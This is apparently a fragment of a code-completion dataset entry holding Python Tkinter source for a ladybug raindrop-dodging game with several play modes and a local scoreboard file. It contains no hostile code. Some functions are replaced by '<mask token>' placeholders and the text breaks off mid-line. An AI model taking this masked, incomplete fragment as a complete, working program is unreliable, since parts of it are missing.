coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if 
data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef AIRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconutsAI1:\n coconut.draw(canvas)\n for coconut in data.coconutsAI2:\n coconut.draw(canvas)\n canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill\n ='yellow')\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n AIWinner(canvas, data)\n drawHome(canvas, data)\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n 
mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef init(data):\n data.score = 0\n data.mode = 'splashScreen'\n data.timerDelay = 100\n data.height = 800\n data.width = 800\n data.speed = 10\n data.speedAI = 12\n data.speedAI2 = 12\n data.switchOnProgress = False\n data.r = 25\n data.cx = 280\n data.cy = 750\n data.onLeft1, data.onLeft2 = True, True\n data.win = False\n data.coconuts = []\n data.powerUps = []\n data.coconuts1 = []\n data.coconuts2 = []\n data.coconutsAI1 = []\n data.coconutsAI2 = []\n data.invincible = []\n data.pauseDrops = False\n data.pause1Drop = False\n data.pause2Drop = False\n init1(data)\n\n\ndef init1(data):\n data.beInvincible = False\n data.Invincible1 = False\n data.Invincible2 = False\n data.scaryBug = []\n data.time = 0\n data.coconutFall = False\n data.sides = ['r', 'l']\n data.level = 1\n data.splashScreenTime = 0\n data.splashScreenDrops = []\n data.background = PhotoImage(file='tree.gif')\n data.deadScreen = PhotoImage(file='deadBug.gif')\n data.ladyBug = PhotoImage(file='lady.gif')\n data.winScreen = PhotoImage(file='treeTop1.gif')\n data.winBug = PhotoImage(file='littleBug.gif')\n data.halfBackground = PhotoImage(file='halfTree.gif')\n data.umbrella = PhotoImage(file='umbrella2.gif')\n data.spider = PhotoImage(file='spider.gif')\n data.hourGlass = PhotoImage(file='hourGlass.gif')\n data.splashScreen = PhotoImage(file='splash.gif')\n init2(data)\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n 
data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\ndef initScoreBoardHelp(data):\n data.tbgY = 5 * data.height / 12\n data.txtTScore = 150\n data.S_P = 220\n data.numScores = 5\n data.scorePos = data.height / 10\n data.scoreShift = 270\n data.helpY = data.height / 2 - 20\n data.name = ''\n data.printName = ''\n data.hit = False\n initAI(data)\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif 
data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\ndef keyPressed(event, data):\n if data.mode == 'splashScreen':\n splashKeyPressed(event, data)\n elif data.mode == '1Player':\n playerKeyPressed(event, data)\n elif data.mode == '2Player':\n twoPlayerKeyPressed(event, data)\n elif data.mode == 'editor':\n editorKeyPressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedKeyPressed(event, data)\n elif data.mode == 'AI':\n AIKeyPressed(event, data)\n elif data.mode == 'difficulty':\n difficultyKeyPressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardKeyPressed(event, data)\n elif data.mode == 'help':\n helpKeyPressed(event, data)\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif 
data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\ndef splashScreenMousePressed(event, data):\n if (data.splashButtonY - 2 * data.r <= event.x <= data.splashButtonY + \n 2 * data.r):\n if data.p1ButtonX - data.r <= event.y <= data.p1ButtonX + data.r:\n data.mode = '1Player'\n if data.p2ButtonX - data.r <= event.y <= data.p2ButtonX + data.r:\n data.mode = '2Player'\n if data.edButton - data.r <= event.y <= data.edButton + data.r:\n data.mode = 'editor'\n if data.diffButton - data.r <= event.y <= data.diffButton + data.r:\n data.mode = 'difficulty'\n if data.helpButton - data.r <= event.y <= data.helpButton + data.r:\n data.mode = 'help'\n if data.sboardButton - data.r <= event.y <= data.sboardButton + data.r:\n data.mode = 'scoreboard'\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, 
image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - 
data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= 
data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n 
for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\ndef checkHome(event, data):\n if data.homeY - data.r <= event.y <= data.homeY + data.r:\n if data.homeX - data.r <= event.x <= data.homeX + data.r:\n init(data)\n\n\ndef coconutShot(data):\n if data.level > 0 and data.pauseDrops == False:\n if data.time % int(data.levelMax / data.level\n ) == 0 or data.time % 6 == 0:\n xPosition1 = random.randint(0, data.Player1Min - data.buffer)\n xPosition2 = random.randint(data.Player1Max + data.buffer, data\n .width + data.buffer)\n data.coconuts.append(Coconuts(xPosition1, 0))\n data.coconuts.append(Coconuts(xPosition2, 0))\n xPosition4 = random.randint(data.Player1Min - data.buffer, data\n .Player1Max + data.buffer)\n data.coconuts.append(Coconuts(xPosition4, 0))\n if data.time % 5 == 0:\n xPosition3 = random.randint(0, data.Player1Min - data.buffer)\n data.coconuts.append(Coconuts(xPosition3, 0))\n if data.time % int(24 / data.level) == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.coconuts.append(Coconuts(data.Player1Min, 0))\n elif side == 'r':\n data.coconuts.append(Coconuts(data.Player1Max, 0))\n powerUpCoconutShot(data)\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\ndef playerKeyPressed(event, data):\n if data.level < data.levelMax and event.keysym == 'r':\n init(data)\n if event.keysym == 'Left' and data.cx >= data.Player1Min + data.lane / 2:\n data.cx -= data.lane / 2\n elif event.keysym == 'Right' and data.cx <= data.Player1Max:\n data.cx += data.lane / 2\n if data.level >= 
data.levelMax:\n if len(event.keysym) == 1:\n if len(data.name) < 15:\n data.name += event.keysym\n if event.keysym == 'BackSpace':\n data.name = data.name[0:-1]\n if event.keysym == 'Return':\n data.scoreList += data.score, data.name\n writeFile('score.txt', data.savedScores + str(data.score) + ',' +\n data.name + '\\n')\n data.mode = 'scoreboard'\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n 
data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\ndef twoPlayerKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'a' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player1X = 150\n if event.keysym == 'd' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player1X = 330\n if event.keysym == 'Left' and data.onLeft2 == False:\n data.onLeft2 = True\n data.player2X = 550\n if event.keysym == 'Right' and data.onLeft2 == True:\n data.onLeft2 = False\n data.player2X = 750\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in 
data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX 
